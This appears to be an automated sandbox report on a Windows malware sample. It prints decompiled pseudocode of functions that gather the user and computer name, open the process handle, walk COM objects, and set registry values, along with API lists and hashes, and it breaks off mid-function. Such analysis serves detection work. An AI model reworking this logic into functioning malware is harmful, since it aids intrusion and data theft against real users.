                                                          			E04C0853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4c0d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04C09070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04C06E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04C0A734(_a8);
						goto L29;
					}
					_t64 =  *0x4c0d278; // 0x6889a98
					_t16 = _t64 + 0xc; // 0x6889b66
					_t65 = E04C09070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04c0c0
						if(E04C022F1(_t97,  *_t33, _t91, _a8,  *0x4c0d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x4c0d2a8; // 0x1c7a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4c0ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4c0e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04C06C38(_t69,  *0x4c0d334,  *0x4c0d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4c0d2a8; // 0x1c7a5a8
									_t44 = _t71 + 0x4c0e846; // 0x74666f53
									_t73 = E04C09070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04c0c0
										E04C05D7D( *_t47, _t91, _a8,  *0x4c0d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d04c0c0
										E04C05D7D( *_t49, _t91, _t99,  *0x4c0d330, _a16);
										E04C0A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04c0c0
									E04C05D7D( *_t40, _t91, _a8,  *0x4c0d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d04c0c0
									E04C05D7D( *_t43, _t91, _a8,  *0x4c0d330, _a16);
								}
								if( *_t101 != 0) {
									E04C0A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04c0c0
					_t81 = E04C08BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04c0c0
							E04C022F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04C0A734(_t100);
						_t98 = _a16;
					}
					E04C0A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04C0A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4c0d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                                          0x04c0853f
                                                          0x04c08548
                                                          0x04c0854f
                                                          0x04c08554
                                                          0x04c085c1
                                                          0x04c085c7
                                                          0x04c085cc
                                                          0x04c085d3
                                                          0x04c085d8
                                                          0x04c085dd
                                                          0x04c08748
                                                          0x04c0874f
                                                          0x04c0874f
                                                          0x04c08754
                                                          0x04c08756
                                                          0x04c08756
                                                          0x04c0875f
                                                          0x04c0875f
                                                          0x04c085e3
                                                          0x04c085ef
                                                          0x04c0873e
                                                          0x04c08741
                                                          0x00000000
                                                          0x04c08741
                                                          0x04c085f5
                                                          0x04c085fa
                                                          0x04c085fd
                                                          0x04c08602
                                                          0x04c08607
                                                          0x04c08650
                                                          0x04c08650
                                                          0x04c08663
                                                          0x04c0866d
                                                          0x04c08673
                                                          0x04c0867a
                                                          0x04c08684
                                                          0x04c08684
                                                          0x04c0867c
                                                          0x04c0867c
                                                          0x04c0867c
                                                          0x04c0867c
                                                          0x04c086a6
                                                          0x04c086ae
                                                          0x04c086dc
                                                          0x04c086e1
                                                          0x04c086e8
                                                          0x04c086ed
                                                          0x04c086f1
                                                          0x04c08723
                                                          0x04c086f3
                                                          0x04c08700
                                                          0x04c08703
                                                          0x04c08713
                                                          0x04c08716
                                                          0x04c0871c
                                                          0x04c0871c
                                                          0x04c086b0
                                                          0x04c086bd
                                                          0x04c086c0
                                                          0x04c086d2
                                                          0x04c086d5
                                                          0x04c086d5
                                                          0x04c0872d
                                                          0x04c08739
                                                          0x04c0872f
                                                          0x04c08732
                                                          0x04c08732
                                                          0x04c0872d
                                                          0x04c086a6
                                                          0x00000000
                                                          0x04c0866d
                                                          0x04c08616
                                                          0x04c08619
                                                          0x04c08620
                                                          0x04c08626
                                                          0x04c08629
                                                          0x04c0862b
                                                          0x04c08637
                                                          0x04c0863a
                                                          0x04c0863a
                                                          0x04c08640
                                                          0x04c08645
                                                          0x04c08645
                                                          0x04c0864b
                                                          0x00000000
                                                          0x04c0864b
                                                          0x04c08559
                                                          0x00000000
                                                          0x04c08580
                                                          0x04c08580
                                                          0x04c0858c
                                                          0x04c0859f
                                                          0x04c085a5
                                                          0x04c085ad
                                                          0x00000000
                                                          0x04c085ad

                                                          APIs
                                                          • StrChrA.SHLWAPI(04C03741,0000005F,00000000,00000000,00000104), ref: 04C08572
                                                          • lstrcpy.KERNEL32(?,?), ref: 04C0859F
                                                            • Part of subcall function 04C09070: lstrlen.KERNEL32(?,00000000,06889A98,00000000,04C08808,06889C76,?,?,?,?,?,63699BC3,00000005,04C0D00C), ref: 04C09077
                                                            • Part of subcall function 04C09070: mbstowcs.NTDLL ref: 04C090A0
                                                            • Part of subcall function 04C09070: memset.NTDLL ref: 04C090B2
                                                            • Part of subcall function 04C05D7D: lstrlenW.KERNEL32(?,?,?,04C08708,3D04C0C0,80000002,04C03741,04C0A513,74666F53,4D4C4B48,04C0A513,?,3D04C0C0,80000002,04C03741,?), ref: 04C05DA2
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 04C085C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 684609e83c4ab6c1cf4875f5553ed6316a4392dd8b060ed1a91cc65e9b187794
                                                          • Instruction ID: 66ce2652e974f9cbd8b04a27e68bd477d713190d15d54d84a2371fe8dc68b791
                                                          • Opcode Fuzzy Hash: 684609e83c4ab6c1cf4875f5553ed6316a4392dd8b060ed1a91cc65e9b187794
                                                          • Instruction Fuzzy Hash: 54515D76100209EFEF21AFA5DD44EAA7BBAEF04344F01C514FA15561A0E739EE65EF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0A199, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C0A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04C0A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04C0A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4c01fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                          0x04c0a1a7
                                                          0x04c0a1aa
                                                          0x04c0a1ad
                                                          0x04c0a1b3
                                                          0x04c0a1b8
                                                          0x04c0a1be
                                                          0x04c0a1c6
                                                          0x04c0a1c9
                                                          0x04c0a1cf
                                                          0x04c0a1d4
                                                          0x04c0a1e1
                                                          0x04c0a1ee
                                                          0x04c0a1f2
                                                          0x04c0a1f4
                                                          0x04c0a1f8
                                                          0x04c0a1fb
                                                          0x04c0a20b
                                                          0x04c0a25e
                                                          0x04c0a25f
                                                          0x04c0a20d
                                                          0x04c0a212
                                                          0x04c0a213
                                                          0x04c0a218
                                                          0x04c0a21b
                                                          0x04c0a22e
                                                          0x00000000
                                                          0x04c0a230
                                                          0x04c0a233
                                                          0x04c0a238
                                                          0x04c0a246
                                                          0x04c0a249
                                                          0x04c0a24f
                                                          0x04c0a254
                                                          0x00000000
                                                          0x04c0a256
                                                          0x04c0a256
                                                          0x04c0a259
                                                          0x04c0a259
                                                          0x04c0a254
                                                          0x04c0a22e
                                                          0x04c0a264
                                                          0x04c0a265
                                                          0x04c0a1d4
                                                          0x04c0a26b

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04C01FD2), ref: 04C0A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04C01FD2), ref: 04C0A1C9
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04C01FD2), ref: 04C0A203
                                                          • GetComputerNameW.KERNEL32(04C01FD2,?), ref: 04C0A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04C01FD2,00000000,04C01FD4,00000000,00000000,?,?,04C01FD2), ref: 04C0A249
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 412ad9cfadb0bd99a07aef3c6e6dd61d682c475793e068aaa7a58f73ef80f54e
                                                          • Instruction ID: e4011a80183e81398d11b1dc0f5342354a28caf6fd08c95766feed0504a7f289
                                                          • Opcode Fuzzy Hash: 412ad9cfadb0bd99a07aef3c6e6dd61d682c475793e068aaa7a58f73ef80f54e
                                                          • Instruction Fuzzy Hash: BD210A76A01208FFDB11DFE8C9849EEBBBDEF54304B1184AAE506E7241E635AB44DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C03DE9, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04C03DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04C05AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04C0A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4c0d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                          0x04c03de9
                                                          0x04c03df6
                                                          0x04c03df8
                                                          0x04c03e5b
                                                          0x00000000
                                                          0x04c03e5b
                                                          0x04c03e10
                                                          0x04c03e17
                                                          0x04c03e23
                                                          0x04c03e28
                                                          0x04c03e2a
                                                          0x04c03e2c
                                                          0x04c03e2e
                                                          0x04c03e30
                                                          0x04c03e32
                                                          0x04c03e3e
                                                          0x04c03e4e
                                                          0x00000000
                                                          0x04c03e40
                                                          0x04c03e40
                                                          0x04c03e47
                                                          0x04c03e54
                                                          0x04c03e54
                                                          0x04c03e54
                                                          0x04c03e47
                                                          0x04c03e3e
                                                          0x04c03e59
                                                          0x00000000
                                                          0x00000000
                                                          0x04c03e5f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C03E23
                                                          • ResetEvent.KERNEL32(?), ref: 04C03E28
                                                          • GetLastError.KERNEL32 ref: 04C03E40
                                                          • GetLastError.KERNEL32(?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C03E5B
                                                            • Part of subcall function 04C05AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000), ref: 04C05AFD
                                                            • Part of subcall function 04C05AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?), ref: 04C05B5B
                                                            • Part of subcall function 04C05AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B6B
                                                          • SetEvent.KERNEL32(?), ref: 04C03E4E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 96f2f05402b0c5d133dff7bbcb8ba53ac30d94264870155962f8dccf0435d2fc
                                                          • Instruction ID: 1a35d5de617f57d613d44c6d579e832836ef04c3b9c2fb5cae53df2e8b75fa31
                                                          • Opcode Fuzzy Hash: 96f2f05402b0c5d133dff7bbcb8ba53ac30d94264870155962f8dccf0435d2fc
                                                          • Instruction Fuzzy Hash: 94016D31104341ABDB306F71DC44F1BBBAAEF48B68F118B25F962910F0D721F954EA65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C03E69, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04C03E69(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4c0d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4c0d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4c0d258 = _t6;
					 *0x4c0d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4c0d254 = _t7;
					if(_t7 == 0) {
						 *0x4c0d254 =  *0x4c0d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                                          0x04c03e71
                                                          0x04c03e77
                                                          0x04c03e7e
                                                          0x00000000
                                                          0x04c03ed8
                                                          0x04c03e80
                                                          0x04c03e88
                                                          0x04c03e95
                                                          0x04c03e95
                                                          0x04c03ed5
                                                          0x00000000
                                                          0x04c03ed5
                                                          0x04c03e97
                                                          0x04c03e97
                                                          0x04c03e9c
                                                          0x04c03eae
                                                          0x04c03eb3
                                                          0x04c03eb9
                                                          0x04c03ebf
                                                          0x04c03ec6
                                                          0x04c03ec8
                                                          0x04c03ec8
                                                          0x00000000
                                                          0x04c03ecf
                                                          0x04c03e91
                                                          0x00000000
                                                          0x00000000
                                                          0x04c03e93
                                                          0x00000000

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04C0131F,?,?,00000001,?,?,?,04C04EF2,?), ref: 04C03E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04C04EF2,?), ref: 04C03EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04C04EF2,?), ref: 04C03ED8
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 07177ecf45bd4f63f543d237d8ccef6380b3d3c7e973dfacbc7a1bf6dccb5f34
                                                          • Instruction ID: 57f465fc3cfd1543e4c521858c62e221e5344017cde7339a6ec14dad50c50e65
                                                          • Opcode Fuzzy Hash: 07177ecf45bd4f63f543d237d8ccef6380b3d3c7e973dfacbc7a1bf6dccb5f34
                                                          • Instruction Fuzzy Hash: 9CF0C278750382ABEB259F74A809B293B62E780705F028716F953CA1E0E778EDC1CF15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C0391F, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(?), ref: 04C0395A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03A3F
                                                            • Part of subcall function 04C06F3A: SysAllocString.OLEAUT32(04C0C290), ref: 04C06F8A
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04C03A92
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C03AA1
                                                            • Part of subcall function 04C01AE2: Sleep.KERNEL32(000001F4), ref: 04C01B2A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                          • String ID:
                                                          • API String ID: 3193056040-0
                                                          • Opcode ID: 9459c08a914a24b8646a042ac3928d4c9b4456979b8fb17d1fcb9fa953ac56bd
                                                          • Instruction ID: a508567ed902e9c3594cb3f6944bb1adedd181646f70aedd4159cfc052199a48
                                                          • Opcode Fuzzy Hash: 9459c08a914a24b8646a042ac3928d4c9b4456979b8fb17d1fcb9fa953ac56bd
                                                          • Instruction Fuzzy Hash: D7519135500649EFDB01CFE8C844A9EB7BAFF88704F258469E905DB260EB35EE45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C06F3A, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 46%
                                                          			E04C06F3A(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4c0d2a8; // 0x1c7a5a8
					_t5 = _t103 + 0x4c0e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4c0c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4c0d2a8; // 0x1c7a5a8
												_t28 = _t109 + 0x4c0e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4c0d2a8; // 0x1c7a5a8
														_t33 = _t79 + 0x4c0e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                                          0x04c06f3f
                                                          0x04c06f48
                                                          0x04c06f49
                                                          0x04c06f4d
                                                          0x04c06f53
                                                          0x04c06f59
                                                          0x04c06f62
                                                          0x04c06f68
                                                          0x04c06f72
                                                          0x04c06f74
                                                          0x04c06f7a
                                                          0x04c06f7f
                                                          0x04c06f8a
                                                          0x04c06f90
                                                          0x04c06f95
                                                          0x04c070b7
                                                          0x04c06f9b
                                                          0x04c06f9b
                                                          0x04c06fa8
                                                          0x04c06fae
                                                          0x04c06fb4
                                                          0x04c06fb8
                                                          0x04c06fbe
                                                          0x04c06fcb
                                                          0x04c06fcf
                                                          0x04c06fd5
                                                          0x04c06fd8
                                                          0x04c06fe0
                                                          0x04c06fe1
                                                          0x04c06fe5
                                                          0x04c06fe9
                                                          0x04c06fec
                                                          0x04c06fef
                                                          0x04c06ff5
                                                          0x04c06ffe
                                                          0x04c07004
                                                          0x04c07005
                                                          0x04c07008
                                                          0x04c07009
                                                          0x04c0700a
                                                          0x04c07012
                                                          0x04c07013
                                                          0x04c07014
                                                          0x04c07016
                                                          0x04c0701a
                                                          0x04c0701e
                                                          0x00000000
                                                          0x00000000
                                                          0x04c07024
                                                          0x04c0702d
                                                          0x04c07033
                                                          0x04c0703d
                                                          0x04c07041
                                                          0x04c07043
                                                          0x04c07050
                                                          0x04c07054
                                                          0x04c0705c
                                                          0x04c07061
                                                          0x04c07073
                                                          0x04c07075
                                                          0x04c0707b
                                                          0x04c0707b
                                                          0x04c07084
                                                          0x04c07084
                                                          0x04c07086
                                                          0x04c0708c
                                                          0x04c0708c
                                                          0x04c0708f
                                                          0x04c07095
                                                          0x04c07098
                                                          0x04c070a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04c070a1
                                                          0x04c06ff5
                                                          0x04c06fef
                                                          0x04c06fd8
                                                          0x04c070a7
                                                          0x04c070a7
                                                          0x04c070ad
                                                          0x04c070ad
                                                          0x04c070b3
                                                          0x04c070b3
                                                          0x04c070bc
                                                          0x04c070c2
                                                          0x04c070c2
                                                          0x04c06f7f
                                                          0x04c070cb

                                                          APIs
                                                          • SysAllocString.OLEAUT32(04C0C290), ref: 04C06F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04C0706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C07084
                                                          • SysFreeString.OLEAUT32(?), ref: 04C070B3
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: c1d4810e4bf7926143d2ee1952f80093acf1217502e8f168f20884a15e6fc72a
                                                          • Instruction ID: baaebe5008f8afce39afdf33f660db0382207c2308369ef099944d1450e131db
                                                          • Opcode Fuzzy Hash: c1d4810e4bf7926143d2ee1952f80093acf1217502e8f168f20884a15e6fc72a
                                                          • Instruction Fuzzy Hash: 20514175D00519EFCB04DFE8C488DAEF7B6EF88704B158695E915EB250D731AE41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04C053C6, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 85%
                                                          			E04C053C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04C01AD1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
